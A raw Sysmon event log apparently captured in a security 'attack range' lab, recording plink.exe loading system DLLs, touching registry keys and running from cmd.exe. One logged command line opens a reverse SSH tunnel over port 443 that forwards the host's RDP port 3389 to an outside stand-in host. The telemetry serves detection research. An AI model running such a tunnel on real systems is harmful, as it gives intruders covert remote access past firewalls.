534500x80000000000000007096186Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:25.013{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exe 11241100x80000000000000007096185Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:25.008{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Users\Administrator\AppData\Local\PUTTY.RND2022-09-15 16:39:08.083 734700x80000000000000007096184Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.960{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\FWPUCLNT.DLL10.0.14393.0 (rs1_release.160715-1616)FWP/IPsec User-Mode APIMicrosoft® Windows® Operating SystemMicrosoft Corporationfwpuclnt.dllMD5=A65FA613342B08E0F760D8B13B9C135A,SHA256=C64A1EC862188D2EE1202DB02BFBF4E2DD56780905E509012799EB57FC9A88EDtrueMicrosoft WindowsValid 12241200x80000000000000007096183Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-CreateKey2022-09-15 16:39:24.960{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x80000000000000007096182Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-CreateKey2022-09-15 16:39:24.960{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x80000000000000007096181Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-CreateKey2022-09-15 16:39:24.960{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x80000000000000007096180Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-CreateKey2022-09-15 16:39:24.960{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 734700x80000000000000007096179Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.960{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\rasadhlp.dll10.0.14393.0 (rs1_release.160715-1616)Remote Access AutoDial HelperMicrosoft® Windows® Operating SystemMicrosoft Corporationrasadhlp.dllMD5=FAE8D0480BDD905EEA453D3A57C8D5C6,SHA256=C1531223B8201B344A6A6474CB2D9B8A8C632250A3A6F472EC5E2D7D28ADD94CtrueMicrosoft WindowsValid 12241200x80000000000000007096178Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-CreateKey2022-09-15 16:39:24.944{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x80000000000000007096177Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-CreateKey2022-09-15 16:39:24.944{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x80000000000000007096176Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-CreateKey2022-09-15 16:39:24.944{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 734700x80000000000000007096175Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.944{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\IPHLPAPI.DLL10.0.14393.2339 (rs1_release_inmarket.180611-1502)IP Helper APIMicrosoft® Windows® Operating SystemMicrosoft Corporationiphlpapi.dllMD5=3CD38EDF9CA12F91131EDEE32D1C9DF5,SHA256=AF2440640BF8BDEAAF0DECDD7C354158E415ED0AA340ABA7A6CCCDC09C1E728BtrueMicrosoft WindowsValid 734700x80000000000000007096174Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.944{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\nsi.dll10.0.14393.3297 (rs1_release_1.191001-1045)NSI User-mode interface DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationnsi.dllMD5=994E2A6D2A0B38E0968B3998E42033AC,SHA256=491F2D1DE09C39B324BCF5800198AC7CCE755F4023F1FEB3854D33716461BC27trueMicrosoft WindowsValid 734700x80000000000000007096173Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.944{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\dnsapi.dll10.0.14393.4350 (rs1_release.210407-2154)DNS Client API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationdnsapiMD5=D7651F99299B13D576A72643BFC44944,SHA256=589302E630C473DBDF4CE92C59F00B029FCA0C228E7111A764166E16025FA1A9trueMicrosoft WindowsValid 734700x80000000000000007096172Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.944{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\mswsock.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft Windows Sockets 2.0 Service ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationmswsock.dllMD5=B52ACA309FD6F72105951FFBA022327B,SHA256=02AB6CCE4BF0D3F075D5E982F5A4CBDB514CE7C245EA474D7846A86CD3F13202trueMicrosoft WindowsValid 11241100x80000000000000007096171Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.944{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Users\Administrator\AppData\Local\PUTTY.RND2022-09-15 16:39:08.083 734700x80000000000000007096170Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.944{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=0BC84513575743DA177F3DFE18D35CA7,SHA256=C40F6AA73073995E05E5379AE593A6617E8296C79A78BD7F716D95F98AE0D899trueMicrosoft WindowsValid 734700x80000000000000007096169Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.944{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\SHCore.dll10.0.14393.5066 (rs1_release.220401-1841)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=FC58D75DDAF44088B9101BE2418B1967,SHA256=74A0CCA04F2405A329897A6A1A3E90A0CE48E5772F85E7188C75677CD9D78160trueMicrosoft WindowsValid 734700x80000000000000007096168Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.944{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x80000000000000007096167Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.944{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\shlwapi.dll10.0.14393.5125 (rs1_release.220429-1732)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=407E895A220DE1A60C5B555A113FE998,SHA256=FE184347784F83953457146562E0F6C87C8DA04D0288415465631325A2A98C92trueMicrosoft WindowsValid 734700x80000000000000007096166Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.944{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=C55F634054E45C0DEE47C254AE009928,SHA256=76EB0FCA87C3AD5FA1C46EB0AF88CF85E172525029E33F5DFC5645EF2EE6F575trueMicrosoft WindowsValid 734700x80000000000000007096165Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.944{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x80000000000000007096164Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.944{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\combase.dll10.0.14393.5192 (rs1_release.220610-1622)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=336FBB55FF4D4E5A05343A51C98A8F74,SHA256=FD42EBCB39DD4311FA7515010FF4D08AC4DFF7D5C35FCB23207833ED4C2E8444trueMicrosoft WindowsValid 734700x80000000000000007096163Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.944{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\windows.storage.dll10.0.14393.5291 (rs1_release.220806-1444)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=AA86B65DCB0ECF7263B863DE2A4E8D00,SHA256=2C4E0CA21438A610DCC55E24190146254E959DC5B8A0DE00BE517365CCCB10FBtrueMicrosoft WindowsValid 734700x80000000000000007096162Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.944{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=77BF2979C1A08EBA43C24FE0B7E547BE,SHA256=071E00374806E043A2E78E88C7FDDCE8F5983DE665DF41F3B3210660BF2EF704trueMicrosoft WindowsValid 734700x80000000000000007096161Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.944{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\shell32.dll10.0.14393.5291 (rs1_release.220806-1444)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=D73641916AB4964C7FE9B4A37473A01B,SHA256=4BB60581FB93D73CDC4F1FBEA2DDACE5D16FE61B6E0E16622C326B6E2F407A7EtrueMicrosoft WindowsValid 734700x80000000000000007096160Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.928{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FADtrueMicrosoft WindowsValid 734700x80000000000000007096159Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.928{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x80000000000000007096158Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.928{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x80000000000000007096157Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.928{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862trueMicrosoft WindowsValid 734700x80000000000000007096156Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.928{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 734700x80000000000000007096155Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.928{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x80000000000000007096154Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.928{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValid 734700x80000000000000007096153Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.928{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5291 (rs1_release.220806-1444)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=F8550606B41FF309D9A1DC76BB4EE875,SHA256=A1FFDD6A2EDA9E0CF047C74B00649A2EA228E3B8BDE1761C66879FA40335C2EBtrueMicrosoft WindowsValid 734700x80000000000000007096152Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.928{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166trueMicrosoft WindowsValid 734700x80000000000000007096151Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.915{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x80000000000000007096150Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.915{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAEtrueMicrosoft WindowsValid 734700x80000000000000007096149Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.915{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\gdi32full.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F284A98093B423946252259D7D2857D3,SHA256=193F70529B68EF108EA17ABC069E6DACF4541A547DF1D2F249F7555A58BCFA07trueMicrosoft WindowsValid 734700x80000000000000007096148Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.915{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x80000000000000007096147Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.915{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x80000000000000007096146Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.915{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 10341000x80000000000000007096145Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.915{D271FDA4-5514-6323-F6FE-000000007402}6043876C:\Windows\system32\conhost.exe{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x80000000000000007096144Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.915{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\KernelBase.dll10.0.14393.5246 (rs1_release.220701-1744)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=96EFBE3DB6300BB13E0720809302FF9F,SHA256=2DE51A861E8D47D75730027E8BD70554363E10449EC258527C491EE8D4A57C2FtrueMicrosoft WindowsValid 734700x80000000000000007096143Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.915{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\kernel32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=92D599E644B89C0F9E7DDB55762EBEA6,SHA256=F32D28EE73EADAF9EF3F30145FA3C52B88DF47236B8747434750832BF1B9CDEEtrueMicrosoft WindowsValid 734700x80000000000000007096142Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.915{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952trueMicrosoft WindowsValid 734700x80000000000000007096141Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.915{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Users\Administrator\Downloads\plink.exeRelease 0.77Command-line SSH, Telnet, and Rlogin clientPuTTY suiteSimon TathamPlinkMD5=41C8E38B48C792EF480A19B8A857CD36,SHA256=653EDDE8520F10019C571F25AD6E61147C06EEECCC7639F69D61D1375CC71EAAtrueSimon TathamValid 10341000x80000000000000007096140Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.915{D271FDA4-6B85-631B-7001-000000007402}41004356C:\Windows\system32\csrss.exe{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007096139Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.915{D271FDA4-553C-6323-01FF-000000007402}66607692C:\Windows\system32\cmd.exe{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007096138Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.918{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeRelease 0.77Command-line SSH, Telnet, and Rlogin clientPuTTY suiteSimon TathamPlink.\plink.exe -ssh -P 443 -l admin1 -pw 2323534647 -R example.com:443:127.0.0.1:3389 example.comC:\Users\Administrator\Downloads\ATTACKRANGE\Administrator{D271FDA4-6B87-631B-16FE-1C0000000000}0x1cfe162HighMD5=41C8E38B48C792EF480A19B8A857CD36,SHA256=653EDDE8520F10019C571F25AD6E61147C06EEECCC7639F69D61D1375CC71EAA{D271FDA4-553C-6323-01FF-000000007402}6660C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c .\plink.exe -ssh -P 443 -l admin1 -pw 2323534647 -R example.com:443:127.0.0.1:3389 example.com 154100x80000000000000007096103Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.904{D271FDA4-553C-6323-01FF-000000007402}6660C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c .\plink.exe -ssh -P 443 -l admin1 -pw 2323534647 -R example.com:443:127.0.0.1:3389 example.comC:\Users\Administrator\Downloads\ATTACKRANGE\Administrator{D271FDA4-6B87-631B-16FE-1C0000000000}0x1cfe162HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2{D271FDA4-5514-6323-F5FE-000000007402}3996C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 534500x80000000000000007095980Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:08.152{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exe 11241100x80000000000000007095979Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:08.149{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exeC:\Users\Administrator\AppData\Local\PUTTY.RND2022-09-15 16:39:08.083 734700x80000000000000007095978Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:08.088{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\FWPUCLNT.DLL10.0.14393.0 (rs1_release.160715-1616)FWP/IPsec User-Mode APIMicrosoft® Windows® Operating SystemMicrosoft Corporationfwpuclnt.dllMD5=A65FA613342B08E0F760D8B13B9C135A,SHA256=C64A1EC862188D2EE1202DB02BFBF4E2DD56780905E509012799EB57FC9A88EDtrueMicrosoft WindowsValid 734700x80000000000000007095951Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:08.088{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\rasadhlp.dll10.0.14393.0 (rs1_release.160715-1616)Remote Access AutoDial HelperMicrosoft® Windows® Operating SystemMicrosoft Corporationrasadhlp.dllMD5=FAE8D0480BDD905EEA453D3A57C8D5C6,SHA256=C1531223B8201B344A6A6474CB2D9B8A8C632250A3A6F472EC5E2D7D28ADD94CtrueMicrosoft WindowsValid 734700x80000000000000007095924Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:08.088{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\mswsock.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft Windows Sockets 2.0 Service ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationmswsock.dllMD5=B52ACA309FD6F72105951FFBA022327B,SHA256=02AB6CCE4BF0D3F075D5E982F5A4CBDB514CE7C245EA474D7846A86CD3F13202trueMicrosoft WindowsValid 